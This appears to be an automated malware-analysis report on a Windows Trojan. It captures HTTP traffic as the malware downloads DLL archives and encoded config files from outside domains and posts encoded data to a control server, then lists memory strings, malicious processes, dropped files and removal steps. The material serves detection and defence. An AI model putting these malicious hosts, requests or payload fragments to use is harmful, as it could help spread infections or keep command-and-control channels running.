KfAM0nxTHeEPsHVqFs8S7njJEYB0tzjVHsgU2BfJChB0tzDTEIB0tz/UFeg33BTYMeQe2C
rSDM8i2ESwc/AW2nxJKtgLxyzVnIy0tzTSHeoN/oXUHNMNgEawc/kc3BXETd4czw/YC4BJ
sHV5HNwPyE3-FeQc0w2ASbBz..



GET /Dragoon/20140618_L.zip HTTP/1.1
User-Agent: MSDN Safa HTTP Retriever 1.0
Host: p1.lingpao8.com


HTTP/1.1 200 OK
Content-Type: application/zip
Connection: keep-alive
Date: Thu, 09 Apr 2015 18:47:05 GMT
Cache-Control:  max-age=86400
Content-Length: 645070
Via: ccn-bj-h-5o4
Expires: Fri, 10 Apr 2015 18:47:05 GMT
Last-Modified: Tue, 10 Mar 2015 06:46:47 GMT
Server: nginx
CC_CACHE: TCP_HIT
Accept-Ranges: bytes
PK.........riF&.2.............LPDragoon.dll..k`S...A..H...T.X&Z6.. ku.
.R....&N...1fn"&...,M...*.tc..nlc.nl....P...)....'n..."......;....{...
9..s....w..>...J0..`._,&.... ...?. ....A..~.F5.J....}..........o..v
.7.......l....=.M.....7..w...........1.Z.;.......nx.._....&...7.......
...fH.....Q.;o.M.gnx..G.....|.k^.{%.."A(.......YZ.iA?j..?(E/..C)... ..
^l..o...}P.B.).d.2-c.Ar.f...O|$..yJ/.$.z...Cz3.>C.0L.6...Y.Q..K.Ie.
.\..2....-.....G....T.. ....y.....SKU...iJE\........y..a.........,....
.(3..s.e.-.......&..a<* .'......._9k.*2...l$.{.....V...Bp... ..5..S
.":.j..C~...M....zk...W.e...."Z..(.[D.`..Sh....C6%.g5c..E.......b8K.#5
. ..8x../.}....{.........ss.....KE.n.(.u...&z..\....X.]P&..b.PC.P..X.'
D...E8....._..e3.... .8.......&%%.c..N...X."$...GT.>J...z.@;..y.o..
.c.1oi.b..G.C....!...y=r..`,...)@W7.od..s.X]Z..xruc. 7....C._.,.O'.(.'
.0..~z. .f3Y...XL.GqrZ.L.f}[email protected]...?L0...\0Q....\..g&O.....qzEH....
'.2.F..2.....0......<:...........4B..v.OT...q...u...b.}....u..).[..
.?..7.3....D.9....}l.X.zn<.,c.......g.'.Gh.|.!...7c.$7`...3......W.
..[.!w...J..M.<4..*y?...'[email protected]/..PO. 9A9APO./".sh..TS.%#.m..
...R....u.wB.r.....Tk........?D.&.Ws...q..?....z.>....n.....A...e.c
.w..B..T.....=.V\.X.&P.U..!..KuJ..\.0.-*.m.....a=3...A2.}...)..B.W....
...........].Hr.....}I@&......s.u=X.a...|........c.S...B-.h.J...v.... 
..6.*.9...z...p*...............E.#l.| .a....l.Sy.{....?l...C..:]R.."..
-om...%..B.=h..'Um}......:QC...R......g.[.}..%*.M.q..*..2BV....1.?...#
.?...A.AI.F/...(........ ...x.[.......n.%.:.n.W..!..F......_...*b.
<<< skipped >>>

GET /Mule/20141125.zip HTTP/1.1


User-Agent: MSDN Safa HTTP Retriever 1.0
Host: p1.lingpao8.com


HTTP/1.1 200 OK
Content-Type: application/zip
Connection: keep-alive
Date: Thu, 09 Apr 2015 18:23:33 GMT
Cache-Control:  max-age=86400
Content-Length: 579171
Via: ccn-bj-h-5o2
Expires: Fri, 10 Apr 2015 18:23:33 GMT
Last-Modified: Tue, 25 Nov 2014 01:23:00 GMT
Server: nginx
CC_CACHE: TCP_HIT
Accept-Ranges: bytes
PK.........JyEY...............LPMule.dll.\.|[email protected].(%-...
UhM.HD...Y.:Y.........8....ss........M[...:...P.U.yK:..J......%i..}...
 .._..{....{.....;..ZA.t... ..._......K..b....W..h..:u...u.kk..r...3.Z
...<........ ..|%..6g.....{VR.h... wx~q.5a(.. >9..p.Ov..........
C. ......>6t3..8....6...O......{.......bAX....>.ni$.K..:F3Z..k..
..</.N<LT.y..x. .....B_.g..'RP\.L....)..u7j...F5..7.].....v. .Th
........ac.....b.Y..7.....D....0...rV..U.Uh.P..B..F"...Y.......P......
.Y5.j.B.....o".q.|5w...].d)<.....2........o..._....OC..k4&.(...lA..
.I.U..t. #.B..j..Q. {>)..V?.......G...O.`...;)O....-.Q.J8..,.*..w..
..!E'..|"]..Gx6=....|..5.'.....&.s...v.'-.u..A..........T`.I......EPU*
T.p...9.l..#uHegV.....U ..R....7l:..O...9..."~.....2..4 .)..........V.
(;..(...P...r. v.IB.#0...G.Ygn.Y[:.............K6...S$mR..........YI?.
.C.<.......G....*..-.4.....~<......7......H>......`..Z~.|..M.
.G.s.m.......4%....t..'.............]../@...}.2}...5..9. 8F[..UM..].&l
t;.b.x6uX9.O.u$.....,~.5.g.Gw.=.N..>...x2..3...-B...P.\m..G...Aj...
./....!cEX.......^....8S........"..TS.A.^.5...9..au.]W%.G.vl.....;h3C:
.u..k..t:.N..s....trj...........qx....>T<.r. `..RO../....Vn../.S
.... [email protected]#)![..4{.F...-.i.eTK. .$..y.h.........2
..y.{.JC.E..)JzA$...wp(-:%....^..;.......}.H. .~...t.H......w.._ }....
.."[email protected]..~.../X...Wh!}..\..?..$......=..b..z.b..
].h.*.7......../.?...o..-w..N.t>?..4..f!w..u..W...`........J[)-...P
p...QbR.!..t.. x..B..4;.r...:...#55..........`/......T.&.LN).8....
<<< skipped >>>


GET /txt/listtl_20150407141150.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=CD00E9BAA99F11C64A5F27BA8E8EC72C HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:28 GMT
Content-Type: text/plain
Content-Length: 13284
Last-Modified: Tue, 07 Apr 2015 06:11:50 GMT
Connection: close
ETag: "55237526-33e4"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROpDSKToZum70zsj HGqfeSM0lc2pwpaCNwaxV/U
fWW/VraqF7LW0OhVk7d2ZFrkMvoY8crglHLQIjIsBHP4wWnuLjFpkZ60nAD3V4kDIxF93L
DH6rQcomdRaktX2hPw eLOty/nc91EqLgo1tc/XPqD5cKmBU2C4mQkDh0JFmqyalequdht
/HrBU4YED98Tf7IHbzeOBaCbX Rd4SAJZCExKdZY0pDT93YQNBCB6D4UK1Z58b1VNHKAam
2Z0Wi0U/ERmY8pUqO74viD6Yi4LO/azAHkiFOFVhcV YenfG zr09pnafroaO1lRV1CNEo
Mi3tj/wXyoSa9dfBbYfZEOgEMn9aKLL7RLwcMsWxEQXtmyibH3 ARoHxpyl6fRE7xM5Qg7
QoT7SkyUkzfIW8NkXX8HHOIYeGWmXXV8umbUzZ eddjk8/Yha8457BuSpPdXYscal4lvUt
sVRMOC7ioPx3ZgkhWIS0ia1fi 6ztK7nAjFTWVPT18t7DRcM4ivxCqsePOCnOuIYf5XDvw
mVU8gh0//wpaXQIoK0rrPuzZ1QXbzUJcXQNKlT1sm/HviudONfDJi/LOT4v2D84EJwKP7p
  PmkqrE20i3v5AsxmZ rYys4t6ThLJxs0cpWE0RTR4IIxlyxN0EUQeqXOXls p Ba/IvE
YZj7J7Io99Rik1FY9wifBeXhHkE jfz78D1lOMDgh4IOXSVtPAYwr1tzYRqPCwyapaiiSG
gSQPXPIZs2M9 zY0LuBzBg8w/LDYLANv07j71HZxD7wLbTWZrn967TqeTOUQeaPWXIQavm
smzFX6a4ePKt4CkxyuYocjsCjzOOzDBzT5lAWFrr6jXoNCzjLjnGIKCrSjpeN6Id62frzF
fNNMgni92iHrSVH8T5w r40T9qhYiEj3ORtH4pwwTpHuDBE7k6ccBUdXZQApyTbNa5ep7m
0Sl0bI350xwNt7NZDezGk69kY 7lleB2PwDK7ozq9ChOHBVtg7Tt5r1ilOsoM/nchfmYiX
TpPU2dX5aFM36tVAllC/ WmCsZwhZNzG4l0yvc92 MaJWcMqnSrqOkDql0ATl8d5l5 Nxb
Rc TGRHxkLqwzxMAu5Qi88c3rSzfRULK5F2LaXeN4p5ZpF1IrP2HqXMqqk0lQlLO7tbTge
cyyfRowoLmZN9W7804s4XPtAf3Ihn0PhWj33b0r19GGgCSxNAehZJB9W1J1bU22/QJJgTd
IqwvawqtaJPYg8s/j8JDFFKFIA6SuN hfAWSCqI833E9ys29vyxRWZKGLlhUTA29d u6t4
CiFAjsiWAhzZO9V4lPW9bAmpVsz8EhgEtkRW54ljnbSZjkz0GioBHpVCbVdysz2b4ASTCy
 PR4u67MVCMldevQQCoTnu5UCkN6/bBEY3BbGJx0lIU2PaKiTp3b6M6ULd1IXXNXfbu2QG
Dcm6pAKcSJ aKpNjlvst94o14NaJfMzZkWvFlEkdoGeCb37n5EOcQ9Kl5EyXmEa2F8
<<< skipped >>>


GET /txt/qpqpqp_201504071411.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=943BDB56E3DD58E41FDB56A349DB6CBA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:24 GMT
Content-Type: text/plain
Content-Length: 101060
Last-Modified: Tue, 07 Apr 2015 06:11:35 GMT
Connection: close
ETag: "55237517-18ac4"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WuxZiU159BpcAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnLF3VTot Nw KQuoOvqtrIGg25nw3LPimai8CmDE 
lWxVdvd4fM5qTZsRLY7k/nG3y7wEF98GVxqHv39AlZ5xw6sx6ohfHX1w0nOYF CoQPGMTa
zQ2ZSPlrxNrNDZlI WstAut164t3QSP79HQXUw/X92DT6wOksX3/ueM56z4EVFv6jW9w8n
Rese6sMPFlnTmEGpuI0LPmZJcnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbb2hs7W wuKsezZX
bDlu05frDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a/b4BHB6ulTDGAkVgWBkiG
jE2s0NmUj5a8TazQ2ZSPlrvaU0Ts8W3A/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a2Rn 78l1t3lxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a0
zzJiZ//c4h65fn8Ln2q1yLGKZPpXit78TazQ2ZSPlrVxHHzkU4nwsZ/mTGsYxWezoVSKWR
99Rh8ANkdTVvVnDE2s0NmUj5axJGIauKgU68P0ady7illlieAhgy7q4bOOsxw8exR9MPxN
rNDZlI WtwtiPSWquUIsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oVmJamSIZgDqoYT6wCSBWT9tEjHURKqtAnVZlVfwOy7qMrSf 27YDFme2aUO BfpzeWF
XQV chY0grpy7LNlrEbarEfAqzOaV6NVCbR0RqCGByNOTmnxYwcwVJG/n4yU8vrCF 8 U1
o9sUeFyyvDGDIAzB7b6N5kHuGPehVYtqVPLM TK9KcBjSuZye48ffJh kxiOUkfFK3
<<< skipped >>>


GET /txt/miniIE_150328.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=5C6AF7F6153B48B9FA2A2663E2D9B114 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:27 GMT
Content-Type: text/plain
Content-Length: 1591992
Last-Modified: Sat, 28 Mar 2015 10:13:36 GMT
Connection: close
ETag: "55167ed0-184ab8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wvq/lGe PyKoQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnIwdeoQ/p3LZzBo/F8sBT14gU gqvqaR HsRQ0eMl
j6jyfjxN Sljm4uxTQeIsstKIgXEZuNNwlSFWZ/Ocl6ajVqrL9FP48YRqiB3vEjm3LlLBj
8CmI5HI0dvaAgvZkgrkgBNIKspJzspbEiSObNPaK3flTHHFmlFfE2s0NmUj5a8TazQ2ZSP
lrxNrNDZlI WuxjdyElk00EeSi8xhyMKD 92DT6wOksX2th2dXQlLq5YBw5M88ooLuBUZV
UoVHzMaJ LJTSAQIz5cnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbeDk35AUHl73704CS7yc i
XrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a2Kt2dA5m9gBycJWlJMa0P3E2s0N
mUj5a8TazQ2ZSPlr1QOEnUxTIJU1vFqnvbGZ3MTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvTu7cpOA81gvaiFmligdDpxNrNDZlI WvE2s0NmUj5a gQ7yxf
KZOvBOrtXeE9LW754EIg5v4qQcTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9TqpNerr1aGRAb
rb1cc4S3PE2s0NmUj5a qSnCa1jASD9aoTtByytZaYCZROdOXZqEXFSC27PeBSxNrNDZlI
 WtwtiPSWquUIrkSjdIyYLDPA9nNBCdKOklMd30e1/UzV8TazQ2ZSPlr8/NtRTCxZ I/Rp
3LuKWWWJxdivcBMxP3Pq2m4CH AB/E2s0NmUj5a qSnCa1jASD 8BgGQTR5rX5Hx0qIky8
dBh5Ok2HQxQhxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a n PLUdYAM7VLiNb tdiazTBg4AZJAmX9P9
KT/plwKzRWgwWG/PzhWlGTRqOMP2O48EePoyNjE9bQuOOiksOFw1Ptu7AIAm n 9dcpHTN
4owe4IIskTnIPb8xYIKL6268 iq1CD6QKcNMscEC72s0xfc RFpqWAgQ1OPiQ9gr3A
<<< skipped >>>


GET /pki/crl/products/WinIntPCA.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Mon, 05 Apr 2010 23:14:32 GMT
Accept-Ranges: bytes
ETag: "07ca8bf15d5ca1:0"
Server: Microsoft-IIS/8.5
VTag: 438436827000000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 528
Cache-Control: max-age=900
Date: Fri, 10 Apr 2015 10:23:46 GMT
Connection: keep-alive
0...0.....0...*.H........0..1.0...U....US1.0...U....Washington1.0...U.
...Redmond1.0...U....Microsoft Corporation1806..U.../Microsoft Windows
 Verification Intermediate PCA..100405230430Z.A0?0...U.#..0.....[3.A..
.BrvWo..%Sz.0... .....7.......0...U.......0...*.H.............P^0...8.
.(3k&.SD..F6g.C...l...,...=.'V..u..l=..Qz..<...u...>.......A..:.
........2./....u*. =.G..B&)"...'.I. x ......vOP...N..CE...Z. C407...U.
.. ."..#.Z7P...E.t..$i..n..p......-.;[email protected][..X...0...n
..}.D#.8....Nx.H- .....~.kC..`qFZ`w.............



GET /txt/listsf_20150409190438.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=C5C6AE13D23B73839E356DD658D8FFAB HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:20 GMT
Content-Type: text/plain
Content-Length: 943400
Last-Modified: Thu, 09 Apr 2015 11:04:40 GMT
Connection: close
ETag: "55265cc8-e6528"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLC0Gxm1Ic5e3/BrXjoWcC7la2qhey
1tDoWb0Ioy1QKTJx So7GBBj  htgXbXNHsMfVFAlNp9rwZ5w7mEi1AIOGxXwzRLaQXdWo
oAth5PLSfrCIjQw9d8sooB4lX0mKol5qeOa1Alnx/VNLik4qEsDCzusVjENn1LTqQAKhAU
bsTWLN7ZgbUMnTH9W1/mZGMtGuHZwXIsRkjVtpzW9LF3rGvqvsz JMHl8TR0tw3WjG3Nko
XygBxp4Ojdf 848oKSOeqD67hPVIkGI3dkx3 Pub5zrJGIvRLgT0jv0sQS2Str9dp Q1Vy
84xKqXMBxAyDYDS4UsO34kenhKMwGGcE3Ba88cox5Or9PMHXuIYfktl8XZ/gdH20HAoU2p
y0oR9vN CkZ oGTstybZ 4fT7lH5SDjPluT64/ONYa2N9tLPAOLfSkAczaISvqvsz JMHl
8YAVoIvUYM4 GYNl qXgXvs 0y74Ri1zHXuWBCLPOd50wKhjhIzEQ/OeiIYaviY6jGEkWu
zYTbDOB//7lyh/DYlx5Sc8rQGZhMca6TsXPDoy5gnSokKRKsFEHv6u0/LSbfO0R3U6yWtx
0avN7uYQLL4QxvLR4oDaYinrWn/DOSMBxd3fFYoA2fWqynbZcHYmRUXZMClAr9wI9i3jsF
HbfCLG4QYm1G7YWbi3soLmjYPrr5Op/8EmdZk5DM5oYX97EzEHQqx47NNtcX7CT9V3IhcN
p 5vE1KKGqdDf2X3dtRc// or33NoP8K0jNT/cQSUxbM6CM YLs P1lTmTAC5duoGkfjpt
Rk1AhdsC6t8Q/zqCeFot55HH05WSu40fYgQlq0Ap4NwnWZe8Lu3tWejE3solgLEL0X7e6X
8pYJR31oo9swisTUyGgrbfAKcNbhBlSFy4DYFs0s21h VpngGX5HzmCXsq3NQnCvn4dxY6
Xzw5G8x8rxT YzRKs3RX7k1pvuWpE75xxD9Ctt9d2vu8Cv TfxFnxQ/HaXnvm1riM3eVyS
wU5c21h0XoO6WvEDgiWoyxM5soD0OedEOu1KloPkGUHUjgaQb3ff3t2liZzLFUzE2bYurj
azpQ00hJYp4eJlntikNnS2cN7/i6JNGRlo /TmM5hqqYkqIrrLWG9UNQCqKdlhEO5ttnsE
1v2vrLZhVQoTrHFrNdJc6LT4Gi2U5raZu07V6SxxmPvfeJpLQo8Uzkjxlaxdn B0fbQcB/
jfHvclI02GAFRp/rgNe6 AcgloYkhRGEAjyIBLN8vV4NaJfMzZkWjku3NTBmSuDa27pF/S
WntZ BAr70gWz 1aubq1R0yDpTphJ2un5XGg R6DA5xgNtm4ZzYbbqrJY/f1AaCaaJn30y
eI5aniuCcIovvjrvMyrBkbtUd6adbAdWxZ1PwoCG N5iWYtG152lhLBJcMmuZwoKrhnfyX
yS10VANy5F7FUcR96zDYgU3602BHZ2xej9SGaUD QXKwLmPaoiVULAOwEA/Lhyp/s4
<<< skipped >>>


POST /index.php?r=LPTemplar/Getinfo4SW&cpt=5527353c013a498 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: MSDN Safa HTTP Retriever 1.0
Host: lpvoidray.lingpao8.com
Content-Length: 67
Cache-Control: no-cache

c=xO_7kDPm4FROcTv6R28N5YbQO1O2KtW9kP2DYsoTitVi9U-qNmLhtXJdTrPDYee

HTTP/1.1 200 OK
Date: Fri, 10 Apr 2015 10:22:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Content-Length: 143
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
55270254001a4540w9emfEJxdMwOKAchrA8SW7BDRO2qVQYQWJ1RytBSz9dvigmyF-NlVR
YWV8AS3okz47sW9UvFCWHGtfuvZvoK3lRnZay3uNAj0RvH7OoLkXqw-fRSIBxZ4xomoTFX
2MO..



GET /txt/urlnav_141114.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:17 GMT
Content-Type: text/plain
Content-Length: 111288
Last-Modified: Fri, 14 Nov 2014 03:29:19 GMT
Connection: close
ETag: "5465770f-1b2b8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wr
MOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3
TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3
dB7txKLcg4QGva912G4GnwNO6uG0yW9iLynDUHq/HLA1I0Mgx7sTvMrqVegigsaPAMlycn
0DaQTrXm/H8aJaRsqeb8fxolpGypFklHa0IUJrWtj4tOAGKUF sMaJudVXlW6wxom51VeV
ZRJhvIVRruRFx5KEBxs2/8UZSS65y3h1b0AuZLZP47s8TazQ2ZSPlrxNrNDZlI Wukxah1
b3uqqMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk l
eK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7AA7l/dPFp2Oo4QVxT3CU2MTazQ2ZSPlrEk
Yhq4qBTrw/Rp3LuKWWWBNKEt5jwcC0SLZsRYA4Cs/E2s0NmUj5a3C2I9Jaq5QixNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oURZpHHpqzKdokEsJbVR23tr2s6uv3 o5ZREMMJf0vpcLusis07 NvMwA6jAbzQgABzI
bqI92FStaOaeCfpWjRWrVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r
648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ41Wy3 HVsBv5Bepmeh2dZe/TnDXSN51O5
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

Explorer.EXE_880_rwx_00FF0000_00004000:

c:\windows\system\pjkni\wininit.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nvsvc32.exe:236
    ndis500.exe:1340
    %original file name%.exe:1360
    MiniIE.exe:2432
    ndsqp.exe:560
    tray.exe:2212
    iawbsms.exe:4008
    wininit.exe:1640

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20141125[1].zip (141890 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20140618_L[1].zip (160210 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\3130B1871A126520A8C47861EFE3ED4D (240 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E04822AD18D472EA5B582E6E6F8C6B9A (528 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20150218[1].zip (26706 bytes)
    %WinDir%\revt\atune.exe (6342 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E04822AD18D472EA5B582E6E6F8C6B9A (256 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\3130B1871A126520A8C47861EFE3ED4D (521 bytes)
    %System%\ndisweb_new.dat0 (8 bytes)
    %System%\ndisweb_new.dat1 (185 bytes)
    %System%\drivers\uniconfi.dat (4943 bytes)
    %System%\drivers\ZWebNds.sys (16 bytes)
    %System%\ndisweb.log (559 bytes)
    C:\ .bat (109 bytes)
    %WinDir%\system\pjkni\wininit.exe (74 bytes)
    %WinDir%\system\oathr\nvsvc32.exe (127 bytes)
    %WinDir%\WaO\exec\services.exe (4331 bytes)
    %WinDir%\WaO\MiniIE.txt (174412 bytes)
    %System%\tl.dat (9 bytes)
    %WinDir%\WaO\exec\tray.exe (7976 bytes)
    %System%\bc.dat (1792 bytes)
    %WinDir%\WaO\sys32\whitelist.txt (3 bytes)
    %WinDir%\WaO\First.txt (18796 bytes)
    %System%\tl.txt (676 bytes)
    %System%\ndsqp.txt (12588 bytes)
    %System%\safe.dat (3780 bytes)
    %WinDir%\WaO\sys32\whitelist.dat (2 bytes)
    %WinDir%\WaO\MiniIE.exe (7731 bytes)
    %System%\ndis500.txt (44948 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\kxxrdti.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\eqoztij.txt (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\cgcwmsq.txt (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\eaurlal.txt (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\vzszrtd.txt (10815 bytes)
    %WinDir%\WaO\iawbsms.exe (110 bytes)
